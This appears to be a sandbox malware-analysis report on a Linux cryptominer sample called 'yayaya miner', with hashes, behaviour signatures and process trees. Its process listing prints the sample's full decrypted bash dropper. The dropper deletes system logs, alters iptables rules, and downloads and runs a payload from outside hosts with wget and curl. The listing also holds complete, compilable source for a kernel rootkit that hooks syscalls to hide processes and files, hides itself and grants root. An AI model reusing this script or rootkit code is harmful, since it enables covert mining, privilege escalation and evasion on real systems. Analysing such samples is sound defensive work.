Overview
overview
10Static
static
10yayaya min...79669C
ubuntu-18.04-amd64
yayaya min...79669C
debian-9-armhf
yayaya min...79669C
debian-9-mips
yayaya min...79669C
debian-9-mipsel
yayaya min...BCD9B4
ubuntu-22.04-amd64
10yayaya min...6FBF08
ubuntu-24.04-amd64
10yayaya min...9DE55F
ubuntu-22.04-amd64
yayaya min...81E359
ubuntu-22.04-amd64
1Analysis
-
max time kernel
5s -
max time network
129s -
platform
ubuntu-22.04_amd64 -
resource
ubuntu2204-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2204-amd64-20240611-enkernel:5.15.0-105-genericlocale:en-usos:ubuntu-22.04-amd64system -
submitted
02-11-2024 14:05
Behavioral task
behavioral1
Sample
yayaya miner/样本/Linux/shc加密脚本/24317B7BDEC69AD6C5075579D979669C
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
yayaya miner/样本/Linux/shc加密脚本/24317B7BDEC69AD6C5075579D979669C
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
yayaya miner/样本/Linux/shc加密脚本/24317B7BDEC69AD6C5075579D979669C
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
yayaya miner/样本/Linux/shc加密脚本/24317B7BDEC69AD6C5075579D979669C
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral5
Sample
yayaya miner/样本/Linux/shc加密脚本/2AEE6DC8E5F8A6AEEF78BD93CDBCD9B4
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral6
Sample
yayaya miner/样本/Linux/挖矿程序/F9C6C41CCE5F8CCD296514DC4F6FBF08
Resource
ubuntu2404-amd64-20240729-en
Behavioral task
behavioral7
Sample
yayaya miner/样本/Linux/隐藏进程程序/0D01BD11D1D3E7676613AACB109DE55F
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral8
Sample
yayaya miner/样本/Linux/隐藏进程程序/C644C04BCE21DACDEB1E6C14C081E359
Resource
ubuntu2204-amd64-20240522.1-en
General
-
Target
yayaya miner/样本/Linux/shc加密脚本/2AEE6DC8E5F8A6AEEF78BD93CDBCD9B4
-
Size
32KB
-
MD5
2aee6dc8e5f8a6aeef78bd93cdbcd9b4
-
SHA1
98e3b6ce5b05a97a2b6c77a88f61f1a1f3d891f4
-
SHA256
0aa920ecef233dce94895ad1e258fa70855fbac8596d862e9a8266bb600c2a78
-
SHA512
de16183d16974d531fb123fb1c4065b7668cd554cf6ef48588d970e0562440164b9bc55dbe64c424ebf5798c2513d75d6dcaf8fa72d5ffa902ec7c7202e71531
-
SSDEEP
768:Dycp0iv+wlXrvIH+tBl+fnN5FRS2R/tX/NU38QV:m5ANmH+tB47DnRha38QV
Malware Config
Signatures
-
Xmrig_linux family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Processes:
insmodioc pid Process /tmp/a/nonono.ko 1947 insmod -
Processes:
rmrmrmrmdescription ioc Process File deleted /var/log/auth.log* rm File deleted /var/log/syslog* rm File deleted /var/log/messages* rm File deleted /var/log/secure* rm -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads list of loaded kernel modules 1 TTPs 1 IoCs
Reads the list of currently loaded kernel modules, possibly to detect virtual environments.
Processes:
grepdescription ioc Process File opened for reading /proc/modules grep -
Command and Scripting Interpreter: Unix Shell 1 TTPs 39 IoCs
Execute scripts via Unix Shell.
Processes:
shshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshpid Process 1922 sh 1929 sh 1863 sh 1866 sh 1878 sh 1883 sh 1908 sh 1858 sh 1896 sh 1946 sh 1861 sh 1868 sh 1871 sh 1895 sh 1903 sh 1659 sh 1849 sh 1856 sh 1881 sh 1915 sh 1876 sh 1893 sh 1894 sh 1650 sh 1653 sh 1657 sh 1873 sh 1875 sh 1853 sh 1902 sh 1904 sh 1655 sh 1910 sh 1924 sh 1927 sh 1901 sh 1905 sh 1913 sh 1944 sh -
Processes:
pidofpidofgrepmvmkdirawkmkdirxargsdescription ioc Process File opened for reading /proc/1037/cmdline pidof File opened for reading /proc/1102/cmdline pidof File opened for reading /proc/17/stat pidof File opened for reading /proc/676/cmdline pidof File opened for reading /proc/1569/cmdline pidof File opened for reading /proc/740/cmdline pidof File opened for reading /proc/809/cmdline pidof File opened for reading /proc/1318/cmdline pidof File opened for reading /proc/self/maps grep File opened for reading /proc/160/stat pidof File opened for reading /proc/75/cmdline pidof File opened for reading /proc/1164/cmdline pidof File opened for reading /proc/73/cmdline pidof File opened for reading /proc/110/cmdline pidof File opened for reading /proc/21/stat pidof File opened for reading /proc/1310/stat pidof File opened for reading /proc/514/cmdline pidof File opened for reading /proc/227/cmdline pidof File opened for reading /proc/417/stat pidof File opened for reading /proc/315/stat pidof File opened for reading /proc/78/stat pidof File opened for reading /proc/966/stat pidof File opened for reading /proc/775/stat pidof File opened for reading /proc/77/stat pidof File opened for reading /proc/607/stat pidof File opened for reading /proc/415/stat pidof File opened for reading /proc/994/stat pidof File opened for reading /proc/1192/cmdline pidof File opened for reading /proc/1158/cmdline pidof File opened for reading /proc/742/cmdline pidof File opened for reading /proc/filesystems mv File opened for reading /proc/77/stat pidof File opened for reading /proc/1197/cmdline pidof File opened for reading /proc/224/cmdline pidof File opened for reading /proc/946/cmdline pidof File opened for reading /proc/24/stat pidof File opened for reading /proc/86/cmdline pidof File opened for reading /proc/88/cmdline pidof File opened for reading /proc/1229/stat pidof File opened for reading /proc/filesystems mkdir File opened for reading /proc/96/cmdline pidof File opened for reading /proc/83/stat pidof File opened for reading /proc/201/cmdline pidof File opened for reading /proc/637/cmdline pidof File opened for reading /proc/1043/stat pidof File opened for reading /proc/1437/cmdline pidof File opened for reading /proc/self/maps awk File opened for reading /proc/101/stat pidof File opened for reading /proc/614/cmdline pidof File opened for reading /proc/filesystems mkdir File opened for reading /proc/77/cmdline pidof File opened for reading /proc/81/cmdline pidof File opened for reading /proc/self/fd xargs File opened for reading /proc/211/cmdline pidof File opened for reading /proc/1381/stat pidof File opened for reading /proc/1107/stat pidof File opened for reading /proc/1362/stat pidof File opened for reading /proc/2/cmdline pidof File opened for reading /proc/1506/stat pidof File opened for reading /proc/750/stat pidof File opened for reading /proc/101/cmdline pidof File opened for reading /proc/1335/cmdline pidof File opened for reading /proc/414/stat pidof File opened for reading /proc/1948/cmdline pidof -
System Network Configuration Discovery 1 TTPs 37 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
mvmakeshshshmvshshshshrmcpshshshshshmvsedpahole-flags.shldunzipshshmakemvmvwgetshshpahole-flags.shpahole-flags.shpahole-flags.shshshpahole-flags.shmakepid Process 1636 mv 1885 make 1893 sh 1924 sh 1944 sh 1626 mv 1895 sh 1905 sh 1910 sh 1946 sh 1635 rm 1637 cp 1650 sh 1868 sh 1894 sh 1904 sh 1917 sh 1583 mv 1652 sed 1911 pahole-flags.sh 1945 ld 1634 unzip 1901 sh 1903 sh 1936 make 1582 mv 1627 mv 1633 wget 1858 sh 1896 sh 1869 pahole-flags.sh 1879 pahole-flags.sh 1859 pahole-flags.sh 1878 sh 1902 sh 1925 pahole-flags.sh 1931 make -
Writes file to tmp directory 64 IoCs
Malware often drops required files in the /tmp directory.
Processes:
asldasgccasasasgccasgcccc1gcccc1objtoolshasgccgccgccgccshascc1bashgccgccmodpostcc1cc1asasgcccc1cc1shascc1cc1cc1cc1asgccgccgccasasascc1cc1ascc1gccgcccc1gccascc1cc1objcopyshgccdescription ioc Process File opened for modification /tmp/a/.tmp_1723/tmp as File opened for modification /tmp/a/.tmp_1723/tmp ld File opened for modification /tmp/a/.tmp_1743/tmp as File opened for modification /tmp/ccjtgowg.s gcc File opened for modification /tmp/a/nonono.mod.o as File opened for modification /tmp/a/.tmp_1711/tmp as File opened for modification /tmp/a/.tmp_1737/tmp as File opened for modification /tmp/ccU8jKL4.s gcc File opened for modification /tmp/a/.tmp_1825/tmp as File opened for modification /tmp/ccmjDalP.s gcc File opened for modification /tmp/ccrkFQiw.s cc1 File opened for modification /tmp/ccw1Bq0m.s gcc File opened for modification /tmp/cck4VyNi.s cc1 File opened for modification /tmp/a/nonono.o objtool File opened for modification /tmp/a/.modules.order.cmd sh File opened for modification /tmp/a/.tmp_1699/tmp as File opened for modification /tmp/ccxG0s2o.s gcc File opened for modification /tmp/cc7tFPXV.s gcc File opened for modification /tmp/ccOoLqUz.s gcc File opened for modification /tmp/cc9e3E3E.s gcc File opened for modification /tmp/a/.nonono.o.cmd sh File opened for modification /tmp/a/.tmp_1681/tmp as File opened for modification /tmp/cc7tFPXV.s cc1 File opened for modification /tmp/a/nonono.h bash File opened for modification /tmp/cceaQCo1.s gcc File opened for modification /tmp/ccj9UGgT.s gcc File opened for modification /tmp/a/Module.symvers modpost File opened for modification /tmp/cc2XHSRf.s cc1 File opened for modification /tmp/cc9e3E3E.s cc1 File opened for modification /tmp/a/.tmp_1837/tmp as File opened for modification /tmp/a/.tmp_1693/tmp as File opened for modification /tmp/ccuLOwa6.s gcc File opened for modification /tmp/ccaTt29I.s cc1 File opened for modification /tmp/a/.nonono.o.d cc1 File opened for modification /tmp/a/.Module.symvers.cmd sh File opened for modification /tmp/a/.tmp_1668/tmp as File opened for modification /tmp/ccxG0s2o.s cc1 File opened for modification /tmp/ccjtgowg.s cc1 File opened for modification /tmp/cciCJAPV.s cc1 File opened for modification /tmp/cc50uC7j.s cc1 File opened for modification /tmp/a/nonono.o as File opened for modification /tmp/cciCJAPV.s gcc File opened for modification /tmp/ccrkFQiw.s gcc File opened for modification /tmp/ccrjw92u.s gcc File opened for modification /tmp/a/.tmp_1749/tmp as File opened for modification /tmp/a/.tmp_1771/tmp as File opened for modification /tmp/a/nonono.c bash File opened for modification /tmp/a/.tmp_1674/tmp as File opened for modification /tmp/ccjCtyHT.s cc1 File opened for modification /tmp/ccOoLqUz.s cc1 File opened for modification /tmp/a/.tmp_1717/tmp as File opened for modification /tmp/ccIQz2v0.s cc1 File opened for modification /tmp/cco1AAj1.s gcc File opened for modification /tmp/cck4VyNi.s gcc File opened for modification /tmp/ccZjViGM.s cc1 File opened for modification /tmp/cc50uC7j.s gcc File opened for modification /tmp/a/.tmp_1687/tmp as File opened for modification /tmp/ccw1Bq0m.s cc1 File opened for modification /tmp/cceaQCo1.s cc1 File opened for modification /tmp/a/.tmp_1723/tmp.o objcopy File opened for modification /tmp/ccmjDalP.s cc1 File opened for modification /tmp/a/.nonono.ko.cmd sh File opened for modification /tmp/.ICE-uniex bash File opened for modification /tmp/ccIy1lqu.s gcc
Processes
-
/tmp/yayaya miner/样本/Linux/shc加密脚本/2AEE6DC8E5F8A6AEEF78BD93CDBCD9B4"/tmp/yayaya miner/样本/Linux/shc加密脚本/2AEE6DC8E5F8A6AEEF78BD93CDBCD9B4"1⤵PID:1571
-
/bin/bash"/tmp/yayaya miner/样本/Linux/shc加密脚本/2AEE6DC8E5F8A6AEEF78BD93CDBCD9B4" -c "exec '/tmp/yayaya miner/样本/Linux/shc加密脚本/2AEE6DC8E5F8A6AEEF78BD93CDBCD9B4' \"\$@\"" "/tmp/yayaya miner/样本/Linux/shc加密脚本/2AEE6DC8E5F8A6AEEF78BD93CDBCD9B4"1⤵PID:1571
-
/tmp/yayaya miner/样本/Linux/shc加密脚本/2AEE6DC8E5F8A6AEEF78BD93CDBCD9B4"/tmp/yayaya miner/样本/Linux/shc加密脚本/2AEE6DC8E5F8A6AEEF78BD93CDBCD9B4"1⤵PID:1571
-
/bin/bash"/tmp/yayaya miner/样本/Linux/shc加密脚本/2AEE6DC8E5F8A6AEEF78BD93CDBCD9B4" -c " #!/bin/bash rm -rf /var/www/html/config.json rm -rf /root/.xmrig.json rm -rf /root/.config/xmrig.json rm -rf /var/log/messages* rm -rf /var/log/secure* rm -rf /var/log/auth.log* rm -rf /var/log/syslog* echo \"fs.file-max = 2097152\" > /etc/sysctl.conf sysctl -p ulimit -SHn 1024000 DIR1=\"/usr/lib/x86_64-linux-gnu\" if [ -d \"\$DIR1\" ]; then echo \"folder ok\" else mkdir \"\$DIR1\" fi DIR2=\"/etc/sysconfig\" if [ -d \"\$DIR2\" ]; then echo \"folder ok\" else mkdir \"\$DIR2\" fi DIR3=\"/etc/sysconfig/yayaya\" if [ -d \"\$DIR3\" ]; then echo \"folder ok\" else mkdir \"\$DIR3\" fi mv /usr/sbin/tokens /usr/sbin/iptables 2>/dev/null 1>/dev/null& mv /sbin/tokens /sbin/iptables 2>/dev/null 1>/dev/null& sleep 1 iptables -L INPUT -v -n | grep 138.68 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 67.207 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 46.101 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 157.245 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 146.190 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 144.126 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 167.172 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 172.104 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 172.105 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s mv /usr/sbin/iptables /usr/sbin/tokens 2>/dev/null 1>/dev/null& mv /sbin/iptables /sbin/tokens 2>/dev/null 1>/dev/null& EXE=`echo \$RANDOM | md5sum | head -c 8` PID=`cat /tmp/.ICE-uniex` if [ -e \"/proc/\$PID/status\" ]; then echo \"process exists\" else echo \"process not exists\" FILE1=\"/etc/sysconfig/yayaya/dsm_sa_ip\" if [ -f \"\$FILE1\" ]; then echo \"PI exists.\" else echo \"PI does not exist.\" wget --timeout=5 --tries=2 http://example.established.site/p.zip -q -O /tmp/p.zip FILE=\"/tmp/p.zip\" if [ -f \"\$FILE\" ]; then echo \"zip exists.\" else echo \"zip does not exist.\" curl --connect-timeout 5 -s -o /tmp/p.zip http://example.established.site/p.zip fi if [ -f \"\$FILE\" ]; then echo \"zip exists.\" else echo \"zip does not exist.\" wget --timeout=5 --tries=2 http://w.amax.fun/p.zip -q -O /tmp/p.zip fi if [ -f \"\$FILE\" ]; then echo \"zip exists.\" else echo \"zip does not exist.\" curl --connect-timeout 5 -s -o /tmp/p.zip http://w.amax.fun/p.zip fi if [ -f \"\$FILE\" ]; then echo \"zip exists.\" else echo \"zip does not exist.\" wget --timeout=5 --tries=2 http://172.104.170.240/p.zip -q -O /tmp/p.zip fi if [ -f \"\$FILE\" ]; then echo \"zip exists.\" else echo \"zip does not exist.\" curl --connect-timeout 5 -s -o /tmp/p.zip http://172.104.170.240/p.zip fi cd /tmp/ unzip -qq -o p.zip rm -rf p.zip mv dsm_sa_ip \"\$FILE1\" fi FILE2=\"/\$EXE\" if [ -f \"\$FILE2\" ]; then echo \"MD exists.\" else echo \"MD does not exist.\" cp \"\$FILE1\" /\"\$EXE\" fi /\"\$EXE\" 2>/dev/null 1>/dev/null& sleep 2 pidof \"\$EXE\" > /tmp/.ICE-uniex rm -rf /\"\$EXE\" mkdir /tmp/a cd /tmp/a rm -rf /tmp/a/* cat <<EOF >>/tmp/a/nonono.h struct linux_dirent { unsigned long d_ino; unsigned long d_off; unsigned short d_reclen; char d_name[1]; }; #define MAGIC_PREFIX \"yayaya\" #define PF_INVISIBLE 0x10000000 #define MODULE_NAME \"nonono\" enum { SIGINVIS = 31, SIGSUPER = 64, SIGMODINVIS = 63, }; #ifndef IS_ENABLED #define IS_ENABLED(option) \\ (defined(__enabled_ ## option) || defined(__enabled_ ## option ## _MODULE)) #endif #if LINUX_VERSION_CODE >= KERNEL_VERSION(5,7,0) #define KPROBE_LOOKUP 1 #include <linux/kprobes.h> static struct kprobe kp = { .symbol_name = \"kallsyms_lookup_name\" }; #endif EOF cat <<EOF >>/tmp/a/nonono.c #include <linux/sched.h> #include <linux/module.h> #include <linux/syscalls.h> #include <linux/dirent.h> #include <linux/slab.h> #include <linux/version.h> #if LINUX_VERSION_CODE < KERNEL_VERSION(4, 13, 0) #include <asm/uaccess.h> #endif #if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 10, 0) #include <linux/proc_ns.h> #else #include <linux/proc_fs.h> #endif #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 26) #include <linux/file.h> #else #include <linux/fdtable.h> #endif #if LINUX_VERSION_CODE <= KERNEL_VERSION(2, 6, 18) #include <linux/unistd.h> #endif #ifndef __NR_getdents #define __NR_getdents 141 #endif #include \"nonono.h\" #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) unsigned long cr0; #elif IS_ENABLED(CONFIG_ARM64) void (*update_mapping_prot)(phys_addr_t phys, unsigned long virt, phys_addr_t size, pgprot_t prot); unsigned long start_rodata; unsigned long init_begin; #define section_size init_begin - start_rodata #endif static unsigned long *__sys_call_table; #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) typedef asmlinkage long (*t_syscall)(const struct pt_regs *); static t_syscall orig_getdents; static t_syscall orig_getdents64; static t_syscall orig_kill; #else typedef asmlinkage int (*orig_getdents_t)(unsigned int, struct linux_dirent *, unsigned int); typedef asmlinkage int (*orig_getdents64_t)(unsigned int, struct linux_dirent64 *, unsigned int); typedef asmlinkage int (*orig_kill_t)(pid_t, int); orig_getdents_t orig_getdents; orig_getdents64_t orig_getdents64; orig_kill_t orig_kill; #endif unsigned long * get_syscall_table_bf(void) { unsigned long *syscall_table; #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 4, 0) #ifdef KPROBE_LOOKUP typedef unsigned long (*kallsyms_lookup_name_t)(const char *name); kallsyms_lookup_name_t kallsyms_lookup_name; register_kprobe(&kp); kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr; unregister_kprobe(&kp); #endif syscall_table = (unsigned long*)kallsyms_lookup_name(\"sys_call_table\"); return syscall_table; #else unsigned long int i; for (i = (unsigned long int)sys_close; i < ULONG_MAX; i += sizeof(void *)) { syscall_table = (unsigned long *)i; if (syscall_table[__NR_close] == (unsigned long)sys_close) return syscall_table; } return NULL; #endif } struct task_struct * find_task(pid_t pid) { struct task_struct *p = current; for_each_process(p) { if (p->pid == pid) return p; } return NULL; } int is_invisible(pid_t pid) { struct task_struct *task; if (!pid) return 0; task = find_task(pid); if (!task) return 0; if (task->flags & PF_INVISIBLE) return 1; return 0; } #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) static asmlinkage long hacked_getdents64(const struct pt_regs *pt_regs) { #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) int fd = (int) pt_regs->di; struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->si; #elif IS_ENABLED(CONFIG_ARM64) int fd = (int) pt_regs->regs[0]; struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->regs[1]; #endif int ret = orig_getdents64(pt_regs), err; #else asmlinkage int hacked_getdents64(unsigned int fd, struct linux_dirent64 __user *dirent, unsigned int count) { int ret = orig_getdents64(fd, dirent, count), err; #endif unsigned short proc = 0; unsigned long off = 0; struct linux_dirent64 *dir, *kdirent, *prev = NULL; struct inode *d_inode; if (ret <= 0) return ret; kdirent = kzalloc(ret, GFP_KERNEL); if (kdirent == NULL) return ret; err = copy_from_user(kdirent, dirent, ret); if (err) goto out; #if LINUX_VERSION_CODE < KERNEL_VERSION(3, 19, 0) d_inode = current->files->fdt->fd[fd]->f_dentry->d_inode; #else d_inode = current->files->fdt->fd[fd]->f_path.dentry->d_inode; #endif if (d_inode->i_ino == PROC_ROOT_INO && !MAJOR(d_inode->i_rdev) /*&& MINOR(d_inode->i_rdev) == 1*/) proc = 1; while (off < ret) { dir = (void *)kdirent + off; if ((!proc && (memcmp(MAGIC_PREFIX, dir->d_name, strlen(MAGIC_PREFIX)) == 0)) || (proc && is_invisible(simple_strtoul(dir->d_name, NULL, 10)))) { if (dir == kdirent) { ret -= dir->d_reclen; memmove(dir, (void *)dir + dir->d_reclen, ret); continue; } prev->d_reclen += dir->d_reclen; } else prev = dir; off += dir->d_reclen; } err = copy_to_user(dirent, kdirent, ret); if (err) goto out; out: kfree(kdirent); return ret; } #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) static asmlinkage long hacked_getdents(const struct pt_regs *pt_regs) { #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) int fd = (int) pt_regs->di; struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->si; #elif IS_ENABLED(CONFIG_ARM64) int fd = (int) pt_regs->regs[0]; struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->regs[1]; #endif int ret = orig_getdents(pt_regs), err; #else asmlinkage int hacked_getdents(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count) { int ret = orig_getdents(fd, dirent, count), err; #endif unsigned short proc = 0; unsigned long off = 0; struct linux_dirent *dir, *kdirent, *prev = NULL; struct inode *d_inode; if (ret <= 0) return ret; kdirent = kzalloc(ret, GFP_KERNEL); if (kdirent == NULL) return ret; err = copy_from_user(kdirent, dirent, ret); if (err) goto out; #if LINUX_VERSION_CODE < KERNEL_VERSION(3, 19, 0) d_inode = current->files->fdt->fd[fd]->f_dentry->d_inode; #else d_inode = current->files->fdt->fd[fd]->f_path.dentry->d_inode; #endif if (d_inode->i_ino == PROC_ROOT_INO && !MAJOR(d_inode->i_rdev) /*&& MINOR(d_inode->i_rdev) == 1*/) proc = 1; while (off < ret) { dir = (void *)kdirent + off; if ((!proc && (memcmp(MAGIC_PREFIX, dir->d_name, strlen(MAGIC_PREFIX)) == 0)) || (proc && is_invisible(simple_strtoul(dir->d_name, NULL, 10)))) { if (dir == kdirent) { ret -= dir->d_reclen; memmove(dir, (void *)dir + dir->d_reclen, ret); continue; } prev->d_reclen += dir->d_reclen; } else prev = dir; off += dir->d_reclen; } err = copy_to_user(dirent, kdirent, ret); if (err) goto out; out: kfree(kdirent); return ret; } void give_root(void) { #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29) current->uid = current->gid = 0; current->euid = current->egid = 0; current->suid = current->sgid = 0; current->fsuid = current->fsgid = 0; #else struct cred *newcreds; newcreds = prepare_creds(); if (newcreds == NULL) return; #if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 5, 0) \\ && defined(CONFIG_UIDGID_STRICT_TYPE_CHECKS) \\ || LINUX_VERSION_CODE >= KERNEL_VERSION(3, 14, 0) newcreds->uid.val = newcreds->gid.val = 0; newcreds->euid.val = newcreds->egid.val = 0; newcreds->suid.val = newcreds->sgid.val = 0; newcreds->fsuid.val = newcreds->fsgid.val = 0; #else newcreds->uid = newcreds->gid = 0; newcreds->euid = newcreds->egid = 0; newcreds->suid = newcreds->sgid = 0; newcreds->fsuid = newcreds->fsgid = 0; #endif commit_creds(newcreds); #endif } static inline void tidy(void) { kfree(THIS_MODULE->sect_attrs); THIS_MODULE->sect_attrs = NULL; } static struct list_head *module_previous; static short module_hidden = 0; void module_show(void) { list_add(&THIS_MODULE->list, module_previous); module_hidden = 0; } void module_hide(void) { module_previous = THIS_MODULE->list.prev; list_del(&THIS_MODULE->list); module_hidden = 1; } #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) asmlinkage int hacked_kill(const struct pt_regs *pt_regs) { #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) pid_t pid = (pid_t) pt_regs->di; int sig = (int) pt_regs->si; #elif IS_ENABLED(CONFIG_ARM64) pid_t pid = (pid_t) pt_regs->regs[0]; int sig = (int) pt_regs->regs[1]; #endif #else asmlinkage int hacked_kill(pid_t pid, int sig) { #endif struct task_struct *task; switch (sig) { case SIGINVIS: if ((task = find_task(pid)) == NULL) return -ESRCH; task->flags ^= PF_INVISIBLE; break; case SIGSUPER: give_root(); break; case SIGMODINVIS: if (module_hidden) module_show(); else module_hide(); break; default: #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) return orig_kill(pt_regs); #else return orig_kill(pid, sig); #endif } return 0; } #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) static inline void write_cr0_forced(unsigned long val) { unsigned long __force_order; asm volatile( \"mov %0, %%cr0\" : \"+r\"(val), \"+m\"(__force_order)); } #endif static inline void protect_memory(void) { #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) write_cr0_forced(cr0); #else write_cr0(cr0); #endif #elif IS_ENABLED(CONFIG_ARM64) update_mapping_prot(__pa_symbol(start_rodata), (unsigned long)start_rodata, section_size, PAGE_KERNEL_RO); #endif } static inline void unprotect_memory(void) { #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) write_cr0_forced(cr0 & ~0x00010000); #else write_cr0(cr0 & ~0x00010000); #endif #elif IS_ENABLED(CONFIG_ARM64) update_mapping_prot(__pa_symbol(start_rodata), (unsigned long)start_rodata, section_size, PAGE_KERNEL); #endif } static int __init nonono_init(void) { __sys_call_table = get_syscall_table_bf(); if (!__sys_call_table) return -1; #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) cr0 = read_cr0(); #elif IS_ENABLED(CONFIG_ARM64) update_mapping_prot = (void *)kallsyms_lookup_name(\"update_mapping_prot\"); start_rodata = (unsigned long)kallsyms_lookup_name(\"__start_rodata\"); init_begin = (unsigned long)kallsyms_lookup_name(\"__init_begin\"); #endif module_hide(); tidy(); #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) orig_getdents = (t_syscall)__sys_call_table[__NR_getdents]; orig_getdents64 = (t_syscall)__sys_call_table[__NR_getdents64]; orig_kill = (t_syscall)__sys_call_table[__NR_kill]; #else orig_getdents = (orig_getdents_t)__sys_call_table[__NR_getdents]; orig_getdents64 = (orig_getdents64_t)__sys_call_table[__NR_getdents64]; orig_kill = (orig_kill_t)__sys_call_table[__NR_kill]; #endif unprotect_memory(); __sys_call_table[__NR_getdents] = (unsigned long) hacked_getdents; __sys_call_table[__NR_getdents64] = (unsigned long) hacked_getdents64; __sys_call_table[__NR_kill] = (unsigned long) hacked_kill; protect_memory(); return 0; } static void __exit nonono_cleanup(void) { unprotect_memory(); __sys_call_table[__NR_getdents] = (unsigned long) orig_getdents; __sys_call_table[__NR_getdents64] = (unsigned long) orig_getdents64; __sys_call_table[__NR_kill] = (unsigned long) orig_kill; protect_memory(); } module_init(nonono_init); module_exit(nonono_cleanup); MODULE_LICENSE(\"Dual BSD/GPL\"); MODULE_AUTHOR(\"m0nad\"); MODULE_DESCRIPTION(\"LKM rootkit\"); EOF cat <<EOF >>/tmp/a/Makefile obj-m := nonono.o CC = gcc -Wall KDIR := /lib/modules/`uname -r`/build PWD := /tmp/a EOF make -C /lib/modules/`uname -r`/build M=/tmp/a modules insmod nonono.ko kill -63 10000000 if grep -q \"nonono\" \"/proc/modules\"; then echo \"M exists\" kill -31 `pidof \"\$EXE\"` kill -63 10000000 else echo \"M not exists\" fi cd /tmp rm -rf /tmp/a fi " "/tmp/yayaya miner/样本/Linux/shc加密脚本/2AEE6DC8E5F8A6AEEF78BD93CDBCD9B4"1⤵
- Writes file to tmp directory
PID:1571 -
/usr/bin/rmrm -rf /var/www/html/config.json2⤵PID:1572
-
-
/usr/bin/rmrm -rf /root/.xmrig.json2⤵PID:1573
-
-
/usr/bin/rmrm -rf /root/.config/xmrig.json2⤵PID:1574
-
-
/usr/bin/rmrm -rf "/var/log/messages*"2⤵
- Deletes log files
PID:1575
-
-
/usr/bin/rmrm -rf "/var/log/secure*"2⤵
- Deletes log files
PID:1576
-
-
/usr/bin/rmrm -rf "/var/log/auth.log*"2⤵
- Deletes log files
PID:1577
-
-
/usr/bin/rmrm -rf "/var/log/syslog*"2⤵
- Deletes log files
PID:1578
-
-
/usr/sbin/sysctlsysctl -p2⤵PID:1579
-
-
/usr/bin/mkdirmkdir /etc/sysconfig2⤵PID:1580
-
-
/usr/bin/mkdirmkdir /etc/sysconfig/yayaya2⤵PID:1581
-
-
/usr/bin/sleepsleep 12⤵PID:1584
-
-
/usr/bin/mvmv /sbin/tokens /sbin/iptables2⤵
- System Network Configuration Discovery
PID:1583
-
-
/usr/bin/mvmv /usr/sbin/tokens /usr/sbin/iptables2⤵
- System Network Configuration Discovery
PID:1582
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1590
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵
- Reads runtime system information
PID:1591
-
-
/usr/bin/grepgrep 138.682⤵PID:1589
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1595
-
-
/usr/bin/awkawk "{print \$8}"2⤵
- Reads runtime system information
PID:1594
-
-
/usr/bin/grepgrep 67.2072⤵PID:1593
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1599
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1598
-
-
/usr/bin/grepgrep 46.1012⤵PID:1597
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1603
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1602
-
-
/usr/bin/grepgrep 157.2452⤵PID:1601
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1607
-
-
